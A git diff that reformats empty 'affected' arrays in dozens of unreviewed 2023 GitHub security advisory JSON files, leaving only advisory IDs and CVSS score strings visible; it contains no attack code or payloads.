a/advisories/unreviewed/2023/04/GHSA-5rvg-fpjf-7h7r/GHSA-5rvg-fpjf-7h7r.json b/advisories/unreviewed/2023/04/GHSA-5rvg-fpjf-7h7r/GHSA-5rvg-fpjf-7h7r.json index f961a1e58a5..0a4c83b3505 100644 --- a/advisories/unreviewed/2023/04/GHSA-5rvg-fpjf-7h7r/GHSA-5rvg-fpjf-7h7r.json +++ b/advisories/unreviewed/2023/04/GHSA-5rvg-fpjf-7h7r/GHSA-5rvg-fpjf-7h7r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-767v-xrqh-x67m/GHSA-767v-xrqh-x67m.json b/advisories/unreviewed/2023/04/GHSA-767v-xrqh-x67m/GHSA-767v-xrqh-x67m.json index d21e7456c03..a3093d08814 100644 --- a/advisories/unreviewed/2023/04/GHSA-767v-xrqh-x67m/GHSA-767v-xrqh-x67m.json +++ b/advisories/unreviewed/2023/04/GHSA-767v-xrqh-x67m/GHSA-767v-xrqh-x67m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-9f4g-pmfg-4p4q/GHSA-9f4g-pmfg-4p4q.json b/advisories/unreviewed/2023/04/GHSA-9f4g-pmfg-4p4q/GHSA-9f4g-pmfg-4p4q.json index 450be550e4e..f8a98029713 100644 --- a/advisories/unreviewed/2023/04/GHSA-9f4g-pmfg-4p4q/GHSA-9f4g-pmfg-4p4q.json +++ b/advisories/unreviewed/2023/04/GHSA-9f4g-pmfg-4p4q/GHSA-9f4g-pmfg-4p4q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-fc8j-8whg-6jmp/GHSA-fc8j-8whg-6jmp.json b/advisories/unreviewed/2023/04/GHSA-fc8j-8whg-6jmp/GHSA-fc8j-8whg-6jmp.json index ff86ebfdcc0..8a8760f9f7a 100644 --- a/advisories/unreviewed/2023/04/GHSA-fc8j-8whg-6jmp/GHSA-fc8j-8whg-6jmp.json +++ b/advisories/unreviewed/2023/04/GHSA-fc8j-8whg-6jmp/GHSA-fc8j-8whg-6jmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-fh2p-qw35-q7r4/GHSA-fh2p-qw35-q7r4.json b/advisories/unreviewed/2023/04/GHSA-fh2p-qw35-q7r4/GHSA-fh2p-qw35-q7r4.json index 0166ca935b5..de1e3de2bf1 100644 --- a/advisories/unreviewed/2023/04/GHSA-fh2p-qw35-q7r4/GHSA-fh2p-qw35-q7r4.json +++ b/advisories/unreviewed/2023/04/GHSA-fh2p-qw35-q7r4/GHSA-fh2p-qw35-q7r4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-h95q-46mc-6g3w/GHSA-h95q-46mc-6g3w.json b/advisories/unreviewed/2023/04/GHSA-h95q-46mc-6g3w/GHSA-h95q-46mc-6g3w.json index 750ab7225c1..81853cab05b 100644 --- a/advisories/unreviewed/2023/04/GHSA-h95q-46mc-6g3w/GHSA-h95q-46mc-6g3w.json +++ b/advisories/unreviewed/2023/04/GHSA-h95q-46mc-6g3w/GHSA-h95q-46mc-6g3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-hv4g-mmv9-qwrp/GHSA-hv4g-mmv9-qwrp.json b/advisories/unreviewed/2023/04/GHSA-hv4g-mmv9-qwrp/GHSA-hv4g-mmv9-qwrp.json index 9137e20139f..d79a66e66e0 100644 --- a/advisories/unreviewed/2023/04/GHSA-hv4g-mmv9-qwrp/GHSA-hv4g-mmv9-qwrp.json +++ b/advisories/unreviewed/2023/04/GHSA-hv4g-mmv9-qwrp/GHSA-hv4g-mmv9-qwrp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-pxf8-p7rv-qrff/GHSA-pxf8-p7rv-qrff.json b/advisories/unreviewed/2023/04/GHSA-pxf8-p7rv-qrff/GHSA-pxf8-p7rv-qrff.json index e870a9dea68..fd0a6c386a8 100644 --- a/advisories/unreviewed/2023/04/GHSA-pxf8-p7rv-qrff/GHSA-pxf8-p7rv-qrff.json +++ b/advisories/unreviewed/2023/04/GHSA-pxf8-p7rv-qrff/GHSA-pxf8-p7rv-qrff.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-qgph-86jf-wcq5/GHSA-qgph-86jf-wcq5.json b/advisories/unreviewed/2023/04/GHSA-qgph-86jf-wcq5/GHSA-qgph-86jf-wcq5.json index feebfd05628..63f9a2692bb 100644 --- a/advisories/unreviewed/2023/04/GHSA-qgph-86jf-wcq5/GHSA-qgph-86jf-wcq5.json +++ b/advisories/unreviewed/2023/04/GHSA-qgph-86jf-wcq5/GHSA-qgph-86jf-wcq5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-r744-phrq-6w44/GHSA-r744-phrq-6w44.json b/advisories/unreviewed/2023/04/GHSA-r744-phrq-6w44/GHSA-r744-phrq-6w44.json index 1bd3e013f9b..9ae9394854d 100644 --- a/advisories/unreviewed/2023/04/GHSA-r744-phrq-6w44/GHSA-r744-phrq-6w44.json +++ b/advisories/unreviewed/2023/04/GHSA-r744-phrq-6w44/GHSA-r744-phrq-6w44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-vccr-c5vf-xh9r/GHSA-vccr-c5vf-xh9r.json b/advisories/unreviewed/2023/04/GHSA-vccr-c5vf-xh9r/GHSA-vccr-c5vf-xh9r.json index 892b283805d..5c507991003 100644 --- a/advisories/unreviewed/2023/04/GHSA-vccr-c5vf-xh9r/GHSA-vccr-c5vf-xh9r.json +++ b/advisories/unreviewed/2023/04/GHSA-vccr-c5vf-xh9r/GHSA-vccr-c5vf-xh9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-wmfr-hvpj-h75h/GHSA-wmfr-hvpj-h75h.json b/advisories/unreviewed/2023/04/GHSA-wmfr-hvpj-h75h/GHSA-wmfr-hvpj-h75h.json index 0e77d0bb1bf..9e9e5162748 100644 --- a/advisories/unreviewed/2023/04/GHSA-wmfr-hvpj-h75h/GHSA-wmfr-hvpj-h75h.json +++ b/advisories/unreviewed/2023/04/GHSA-wmfr-hvpj-h75h/GHSA-wmfr-hvpj-h75h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-4p3h-qrpg-h7hr/GHSA-4p3h-qrpg-h7hr.json b/advisories/unreviewed/2023/05/GHSA-4p3h-qrpg-h7hr/GHSA-4p3h-qrpg-h7hr.json index 7a592981912..7528c8301f8 100644 --- a/advisories/unreviewed/2023/05/GHSA-4p3h-qrpg-h7hr/GHSA-4p3h-qrpg-h7hr.json +++ b/advisories/unreviewed/2023/05/GHSA-4p3h-qrpg-h7hr/GHSA-4p3h-qrpg-h7hr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-5353-grp4-p243/GHSA-5353-grp4-p243.json b/advisories/unreviewed/2023/05/GHSA-5353-grp4-p243/GHSA-5353-grp4-p243.json index 18ecade2a81..14ac0f43133 100644 --- a/advisories/unreviewed/2023/05/GHSA-5353-grp4-p243/GHSA-5353-grp4-p243.json +++ b/advisories/unreviewed/2023/05/GHSA-5353-grp4-p243/GHSA-5353-grp4-p243.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-8wvv-chwp-prvw/GHSA-8wvv-chwp-prvw.json b/advisories/unreviewed/2023/05/GHSA-8wvv-chwp-prvw/GHSA-8wvv-chwp-prvw.json index bc4eb3ddd53..33607026fe7 100644 --- a/advisories/unreviewed/2023/05/GHSA-8wvv-chwp-prvw/GHSA-8wvv-chwp-prvw.json +++ b/advisories/unreviewed/2023/05/GHSA-8wvv-chwp-prvw/GHSA-8wvv-chwp-prvw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-g8w2-r832-c3p7/GHSA-g8w2-r832-c3p7.json b/advisories/unreviewed/2023/05/GHSA-g8w2-r832-c3p7/GHSA-g8w2-r832-c3p7.json index 5898efe6aff..a70656c2c28 100644 --- a/advisories/unreviewed/2023/05/GHSA-g8w2-r832-c3p7/GHSA-g8w2-r832-c3p7.json +++ b/advisories/unreviewed/2023/05/GHSA-g8w2-r832-c3p7/GHSA-g8w2-r832-c3p7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-gwq3-cjp5-74m9/GHSA-gwq3-cjp5-74m9.json b/advisories/unreviewed/2023/05/GHSA-gwq3-cjp5-74m9/GHSA-gwq3-cjp5-74m9.json index f14f6d3f5c1..c09be4fb0b3 100644 --- a/advisories/unreviewed/2023/05/GHSA-gwq3-cjp5-74m9/GHSA-gwq3-cjp5-74m9.json +++ b/advisories/unreviewed/2023/05/GHSA-gwq3-cjp5-74m9/GHSA-gwq3-cjp5-74m9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-hw4x-q63w-42vp/GHSA-hw4x-q63w-42vp.json b/advisories/unreviewed/2023/05/GHSA-hw4x-q63w-42vp/GHSA-hw4x-q63w-42vp.json index c4703d12ea0..54261748438 100644 --- a/advisories/unreviewed/2023/05/GHSA-hw4x-q63w-42vp/GHSA-hw4x-q63w-42vp.json +++ b/advisories/unreviewed/2023/05/GHSA-hw4x-q63w-42vp/GHSA-hw4x-q63w-42vp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-hxhp-8773-v9f8/GHSA-hxhp-8773-v9f8.json b/advisories/unreviewed/2023/05/GHSA-hxhp-8773-v9f8/GHSA-hxhp-8773-v9f8.json index 1ed36f4bedd..f38efe54a02 100644 --- a/advisories/unreviewed/2023/05/GHSA-hxhp-8773-v9f8/GHSA-hxhp-8773-v9f8.json +++ b/advisories/unreviewed/2023/05/GHSA-hxhp-8773-v9f8/GHSA-hxhp-8773-v9f8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-pwqv-pfwc-3854/GHSA-pwqv-pfwc-3854.json b/advisories/unreviewed/2023/05/GHSA-pwqv-pfwc-3854/GHSA-pwqv-pfwc-3854.json index d6f743e4aed..9b94b0e55b8 100644 --- a/advisories/unreviewed/2023/05/GHSA-pwqv-pfwc-3854/GHSA-pwqv-pfwc-3854.json +++ b/advisories/unreviewed/2023/05/GHSA-pwqv-pfwc-3854/GHSA-pwqv-pfwc-3854.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-rp8v-59gg-c7h6/GHSA-rp8v-59gg-c7h6.json b/advisories/unreviewed/2023/05/GHSA-rp8v-59gg-c7h6/GHSA-rp8v-59gg-c7h6.json index d343169662e..a6d7b7a9404 100644 --- a/advisories/unreviewed/2023/05/GHSA-rp8v-59gg-c7h6/GHSA-rp8v-59gg-c7h6.json +++ b/advisories/unreviewed/2023/05/GHSA-rp8v-59gg-c7h6/GHSA-rp8v-59gg-c7h6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-vhmc-97xx-rvxh/GHSA-vhmc-97xx-rvxh.json b/advisories/unreviewed/2023/05/GHSA-vhmc-97xx-rvxh/GHSA-vhmc-97xx-rvxh.json index 14dfa7506ce..46005088531 100644 --- a/advisories/unreviewed/2023/05/GHSA-vhmc-97xx-rvxh/GHSA-vhmc-97xx-rvxh.json +++ b/advisories/unreviewed/2023/05/GHSA-vhmc-97xx-rvxh/GHSA-vhmc-97xx-rvxh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-xgf4-6mjg-7hqq/GHSA-xgf4-6mjg-7hqq.json b/advisories/unreviewed/2023/05/GHSA-xgf4-6mjg-7hqq/GHSA-xgf4-6mjg-7hqq.json index 23932b7b5af..f698302dd5b 100644 --- a/advisories/unreviewed/2023/05/GHSA-xgf4-6mjg-7hqq/GHSA-xgf4-6mjg-7hqq.json +++ b/advisories/unreviewed/2023/05/GHSA-xgf4-6mjg-7hqq/GHSA-xgf4-6mjg-7hqq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/05/GHSA-xrgv-hghj-6jpj/GHSA-xrgv-hghj-6jpj.json b/advisories/unreviewed/2023/05/GHSA-xrgv-hghj-6jpj/GHSA-xrgv-hghj-6jpj.json index 23a14e2a614..a004663caa2 100644 --- a/advisories/unreviewed/2023/05/GHSA-xrgv-hghj-6jpj/GHSA-xrgv-hghj-6jpj.json +++ b/advisories/unreviewed/2023/05/GHSA-xrgv-hghj-6jpj/GHSA-xrgv-hghj-6jpj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-4hc8-554p-pqq5/GHSA-4hc8-554p-pqq5.json b/advisories/unreviewed/2023/06/GHSA-4hc8-554p-pqq5/GHSA-4hc8-554p-pqq5.json index f3d43e318ee..a62585a93ff 100644 --- a/advisories/unreviewed/2023/06/GHSA-4hc8-554p-pqq5/GHSA-4hc8-554p-pqq5.json +++ b/advisories/unreviewed/2023/06/GHSA-4hc8-554p-pqq5/GHSA-4hc8-554p-pqq5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-66c6-54m6-93hh/GHSA-66c6-54m6-93hh.json b/advisories/unreviewed/2023/06/GHSA-66c6-54m6-93hh/GHSA-66c6-54m6-93hh.json index 64dfef1e841..0978dbc44d1 100644 --- a/advisories/unreviewed/2023/06/GHSA-66c6-54m6-93hh/GHSA-66c6-54m6-93hh.json +++ b/advisories/unreviewed/2023/06/GHSA-66c6-54m6-93hh/GHSA-66c6-54m6-93hh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-698p-cwrw-qvv2/GHSA-698p-cwrw-qvv2.json b/advisories/unreviewed/2023/06/GHSA-698p-cwrw-qvv2/GHSA-698p-cwrw-qvv2.json index 6910e472fe8..f06746923d3 100644 --- a/advisories/unreviewed/2023/06/GHSA-698p-cwrw-qvv2/GHSA-698p-cwrw-qvv2.json +++ b/advisories/unreviewed/2023/06/GHSA-698p-cwrw-qvv2/GHSA-698p-cwrw-qvv2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-6q75-cf38-2p9p/GHSA-6q75-cf38-2p9p.json b/advisories/unreviewed/2023/06/GHSA-6q75-cf38-2p9p/GHSA-6q75-cf38-2p9p.json index 871e6a6ba25..d518c31c5d8 100644 --- a/advisories/unreviewed/2023/06/GHSA-6q75-cf38-2p9p/GHSA-6q75-cf38-2p9p.json +++ b/advisories/unreviewed/2023/06/GHSA-6q75-cf38-2p9p/GHSA-6q75-cf38-2p9p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-8f4c-mxmx-gjgv/GHSA-8f4c-mxmx-gjgv.json b/advisories/unreviewed/2023/06/GHSA-8f4c-mxmx-gjgv/GHSA-8f4c-mxmx-gjgv.json index 22dc4ad8ce4..0be2ae947d9 100644 --- a/advisories/unreviewed/2023/06/GHSA-8f4c-mxmx-gjgv/GHSA-8f4c-mxmx-gjgv.json +++ b/advisories/unreviewed/2023/06/GHSA-8f4c-mxmx-gjgv/GHSA-8f4c-mxmx-gjgv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-8pjh-cf85-78cc/GHSA-8pjh-cf85-78cc.json b/advisories/unreviewed/2023/06/GHSA-8pjh-cf85-78cc/GHSA-8pjh-cf85-78cc.json index 8bce1837597..dedb507f9fb 100644 --- a/advisories/unreviewed/2023/06/GHSA-8pjh-cf85-78cc/GHSA-8pjh-cf85-78cc.json +++ b/advisories/unreviewed/2023/06/GHSA-8pjh-cf85-78cc/GHSA-8pjh-cf85-78cc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-99qf-r2vf-9g8f/GHSA-99qf-r2vf-9g8f.json b/advisories/unreviewed/2023/06/GHSA-99qf-r2vf-9g8f/GHSA-99qf-r2vf-9g8f.json index e2523145a1d..791414ef16d 100644 --- a/advisories/unreviewed/2023/06/GHSA-99qf-r2vf-9g8f/GHSA-99qf-r2vf-9g8f.json +++ b/advisories/unreviewed/2023/06/GHSA-99qf-r2vf-9g8f/GHSA-99qf-r2vf-9g8f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-9rm7-7c5c-f5vj/GHSA-9rm7-7c5c-f5vj.json b/advisories/unreviewed/2023/06/GHSA-9rm7-7c5c-f5vj/GHSA-9rm7-7c5c-f5vj.json index 26a62a7441d..e9cda731ec3 100644 --- a/advisories/unreviewed/2023/06/GHSA-9rm7-7c5c-f5vj/GHSA-9rm7-7c5c-f5vj.json +++ b/advisories/unreviewed/2023/06/GHSA-9rm7-7c5c-f5vj/GHSA-9rm7-7c5c-f5vj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-9v99-6qcm-j8g8/GHSA-9v99-6qcm-j8g8.json b/advisories/unreviewed/2023/06/GHSA-9v99-6qcm-j8g8/GHSA-9v99-6qcm-j8g8.json index 41ea80111b5..b9bec9d3547 100644 --- a/advisories/unreviewed/2023/06/GHSA-9v99-6qcm-j8g8/GHSA-9v99-6qcm-j8g8.json +++ b/advisories/unreviewed/2023/06/GHSA-9v99-6qcm-j8g8/GHSA-9v99-6qcm-j8g8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-c3v5-q6rv-gj3j/GHSA-c3v5-q6rv-gj3j.json b/advisories/unreviewed/2023/06/GHSA-c3v5-q6rv-gj3j/GHSA-c3v5-q6rv-gj3j.json index c310ff34ca4..93879faa6b6 100644 --- a/advisories/unreviewed/2023/06/GHSA-c3v5-q6rv-gj3j/GHSA-c3v5-q6rv-gj3j.json +++ b/advisories/unreviewed/2023/06/GHSA-c3v5-q6rv-gj3j/GHSA-c3v5-q6rv-gj3j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-c9r2-56cr-xpqg/GHSA-c9r2-56cr-xpqg.json b/advisories/unreviewed/2023/06/GHSA-c9r2-56cr-xpqg/GHSA-c9r2-56cr-xpqg.json index 4094696641c..d62eace21db 100644 --- a/advisories/unreviewed/2023/06/GHSA-c9r2-56cr-xpqg/GHSA-c9r2-56cr-xpqg.json +++ b/advisories/unreviewed/2023/06/GHSA-c9r2-56cr-xpqg/GHSA-c9r2-56cr-xpqg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-fp6g-5cm4-6g9x/GHSA-fp6g-5cm4-6g9x.json b/advisories/unreviewed/2023/06/GHSA-fp6g-5cm4-6g9x/GHSA-fp6g-5cm4-6g9x.json index 8fb3bc24a11..e475b83679a 100644 --- a/advisories/unreviewed/2023/06/GHSA-fp6g-5cm4-6g9x/GHSA-fp6g-5cm4-6g9x.json +++ b/advisories/unreviewed/2023/06/GHSA-fp6g-5cm4-6g9x/GHSA-fp6g-5cm4-6g9x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-fvvc-c9xj-45fv/GHSA-fvvc-c9xj-45fv.json b/advisories/unreviewed/2023/06/GHSA-fvvc-c9xj-45fv/GHSA-fvvc-c9xj-45fv.json index a50fa1117ec..fc3fb6d23db 100644 --- a/advisories/unreviewed/2023/06/GHSA-fvvc-c9xj-45fv/GHSA-fvvc-c9xj-45fv.json +++ b/advisories/unreviewed/2023/06/GHSA-fvvc-c9xj-45fv/GHSA-fvvc-c9xj-45fv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-h382-3gxp-25cx/GHSA-h382-3gxp-25cx.json b/advisories/unreviewed/2023/06/GHSA-h382-3gxp-25cx/GHSA-h382-3gxp-25cx.json index 2d267541910..8489240fcfc 100644 --- a/advisories/unreviewed/2023/06/GHSA-h382-3gxp-25cx/GHSA-h382-3gxp-25cx.json +++ b/advisories/unreviewed/2023/06/GHSA-h382-3gxp-25cx/GHSA-h382-3gxp-25cx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-jrg7-q7cg-93r8/GHSA-jrg7-q7cg-93r8.json b/advisories/unreviewed/2023/06/GHSA-jrg7-q7cg-93r8/GHSA-jrg7-q7cg-93r8.json index 89edfd7484a..ed995947d46 100644 --- a/advisories/unreviewed/2023/06/GHSA-jrg7-q7cg-93r8/GHSA-jrg7-q7cg-93r8.json +++ b/advisories/unreviewed/2023/06/GHSA-jrg7-q7cg-93r8/GHSA-jrg7-q7cg-93r8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-mw9v-2cj7-h4rq/GHSA-mw9v-2cj7-h4rq.json b/advisories/unreviewed/2023/06/GHSA-mw9v-2cj7-h4rq/GHSA-mw9v-2cj7-h4rq.json index d923cfab5a7..b00f94a755d 100644 --- a/advisories/unreviewed/2023/06/GHSA-mw9v-2cj7-h4rq/GHSA-mw9v-2cj7-h4rq.json +++ b/advisories/unreviewed/2023/06/GHSA-mw9v-2cj7-h4rq/GHSA-mw9v-2cj7-h4rq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-p6f2-8wjh-p66x/GHSA-p6f2-8wjh-p66x.json b/advisories/unreviewed/2023/06/GHSA-p6f2-8wjh-p66x/GHSA-p6f2-8wjh-p66x.json index 9253dfcf25e..b104060f94e 100644 --- a/advisories/unreviewed/2023/06/GHSA-p6f2-8wjh-p66x/GHSA-p6f2-8wjh-p66x.json +++ b/advisories/unreviewed/2023/06/GHSA-p6f2-8wjh-p66x/GHSA-p6f2-8wjh-p66x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-p867-3jww-2546/GHSA-p867-3jww-2546.json b/advisories/unreviewed/2023/06/GHSA-p867-3jww-2546/GHSA-p867-3jww-2546.json index 04475cbecf8..e5faa2f43e6 100644 --- a/advisories/unreviewed/2023/06/GHSA-p867-3jww-2546/GHSA-p867-3jww-2546.json +++ b/advisories/unreviewed/2023/06/GHSA-p867-3jww-2546/GHSA-p867-3jww-2546.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-p8fj-9p3h-h46q/GHSA-p8fj-9p3h-h46q.json b/advisories/unreviewed/2023/06/GHSA-p8fj-9p3h-h46q/GHSA-p8fj-9p3h-h46q.json index 575b109445c..afeb470fa75 100644 --- 